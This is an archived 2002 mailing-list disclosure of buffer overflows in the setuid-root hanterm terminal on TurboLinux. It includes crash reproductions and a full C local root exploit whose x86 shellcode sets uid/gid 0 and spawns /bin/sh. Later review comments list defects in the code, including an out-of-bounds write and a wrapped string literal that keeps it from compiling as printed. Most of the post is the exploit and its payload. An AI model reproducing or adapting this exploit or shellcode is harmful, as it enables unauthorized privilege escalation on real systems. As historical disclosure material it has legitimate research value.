Overflow Vulnerabilities in hanterm

From: xperc (xpercat_private)
Date: Thu Feb 07 2002 - 02:33:27 PST


    
    Hi, I'm xperc.
    
      hanterm is a Hangul terminal for X; it is based on the 
    xterm in XFree86. The hanterm binary is installed with 
    setuid root permissions by default on TurboLinux 
    Server 6.5, but it contains insecure code that allows 
    unprivileged local users to obtain root access on the 
    local system.
    
    $which hanterm
    /usr/bin/X11/hanterm
    $ls -l /usr/bin/X11/hanterm
    -rws--x--x	1	root	root 166100  03 13 
    2001 /usr/bin/X11/hanterm*
    $rpm -qf /usr/bin/X11/hanterm
    hanterm-xf-p18-3.3-6
    $hanterm -fn `perl -e 'print "a"x100'`
    Segmentation fault
    $hanterm -hfb `perl -e 'print "a"x8000'`
    Segmentation fault
    $hanterm -hfn `perl -e 'print "a"x8000'`
    Segmentation fault
    ...etc
    
    /* hanterm_exp.c
     *
     * local exploit for hanterm
     *  .. tested in TurboLinux Server 6.5 (Japan)              
     *
     * thanks my Japanese friend kaju(kaijyu)
     * and Japanese hacker UNYUN.
     *
     *                  by xpercat_private
     *                         2002/02/07
     */
    
    #include <stdio.h>
    
    /* Layout constants for the argument buffer built in main(). */
    #define NOP		0x90	/* x86 no-op byte; memset() fills the whole buffer with it */
    #define MAXBUF		88	/* size of buf, the string passed to hanterm as the -fn value */
    #define RETOFS		84	/* centre of the 64-byte window of buf that receives the address guess */
    #define SHELL_OFS 	22	/* offset in buf at which the payload bytes are copied */
    #define ESP_OFS 	-0xe38	/* adjustment added to get_esp() to form the address guess (negative) */
    
    /*
     * Returns this program's current stack pointer on i386.
     *
     * The inline asm moves %esp into %eax and the function then falls off
     * its end with no `return` statement: the caller only receives the
     * value because %eax is the i386 return register and the compiler
     * happens not to touch it in the epilogue. Per the C standard that is
     * undefined behavior, and the asm itself is 32-bit-x86-specific, so
     * this compiles nowhere else and may silently break under optimization.
     */
    unsigned int get_esp()
    {
    	__asm__("mov %esp,%eax");
    }
    
    /*
     * Builds an over-long "-fn" argument and execs the setuid hanterm binary
     * with it (the same input class as the `hanterm -fn aaaa...` crash shown
     * above). The listing is kept exactly as posted; review notes are inline.
     *
     * Review notes (defects are documented, not fixed, to preserve the record):
     *  - memset/strncpy/strlen/execl are called with only <stdio.h> included,
     *    so they are implicitly declared (no <string.h> / <unistd.h>).
     *  - printf("%p") is handed an unsigned int; %p expects a void pointer.
     *  - the address-fill loop writes past the end of buf (see the loop).
     *  - the "-fn" string literal is split across two lines by the archive's
     *    line wrapping; as shown here the file does not compile.
     *  - execl()'s failure return is unchecked and main returns no value.
     *
     * Defensive reading: the segfaults reported above for long -fn/-hfb/-hfn
     * values suggest the setuid binary copies those arguments without a
     * length check. The remediation belongs in hanterm (bounded argument
     * copies, or not installing it setuid root), not in anything here.
     */
    int main()
    {
            static char shellcode[]={	/* raw machine-code payload, left as posted; ends in the string "/bin/sh" and a 0x00 terminator */
                0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
    	    
    0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
                0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
    	    
    0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
                0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
                0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
                0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
            }; 
            unsigned int retadr;	/* address guess: this process's %esp plus ESP_OFS */
    	char buf[MAXBUF];	/* the -fn argument; deliberately never NUL-terminated (see below) */
            int i;
    	
    	memset(buf,NOP,MAXBUF);	/* fill all 88 bytes with the NOP byte; no terminator */

    	/* get_esp() reads this program's own stack pointer; ESP_OFS is negative,
    	 * so the guess lies below it. The value is echoed with %p although it is
    	 * an unsigned int, which is a format/argument mismatch. */
    	retadr=get_esp()+ESP_OFS;
    	printf("Jumping address = %p\n",retadr);

    	/* Stores retadr little-endian (low byte first) into each 4-byte slot
    	 * starting at buf[52], buf[56], ..., buf[112]. MAXBUF is 88, so the
    	 * iterations with i >= 88 write buf[88..115] -- past the end of the
    	 * array, an out-of-bounds stack write in this program itself. */
    	for(i=RETOFS-32;i<RETOFS+32;i+=4){
    		buf[i]	=retadr&0xff;
    		buf[i+1]=(retadr>>8)&0xff;
    		buf[i+2]=(retadr>>16)&0xff;
    		buf[i+3]=(retadr>>24)&0xff;
    	}
    	/* Copies strlen(shellcode) == 54 bytes (the trailing 0x00 element is
    	 * the terminator and is not copied) into buf[22..75], overwriting part
    	 * of the NOP fill; this copy stays within MAXBUF. The `strlen` /
    	 * `(shellcode)` split is archive line-wrapping and is legal C. */
    	strncpy(buf+SHELL_OFS,shellcode,strlen
    (shellcode));
    	/* The author's commented-out line below is the omitted terminator:
    	 * buf holds no zero byte, so execl() reads it as a C string that
    	 * continues past buf[87] into whatever follows on the stack until the
    	 * first zero byte. The argument's length is therefore not MAXBUF. */
    	//buf[MAXBUF-1]='\0';       faint!:-(
    	/* NOTE(review): the "-fn" literal is broken across two lines by mail
    	 * wrapping; as printed this is an unterminated string literal and
    	 * will not compile. execl()'s return value (only reached on failure)
    	 * is not checked. */
    	execl("/usr/bin/X11/hanterm","hanterm","-
    fn",buf,(char *)0);
    }
    


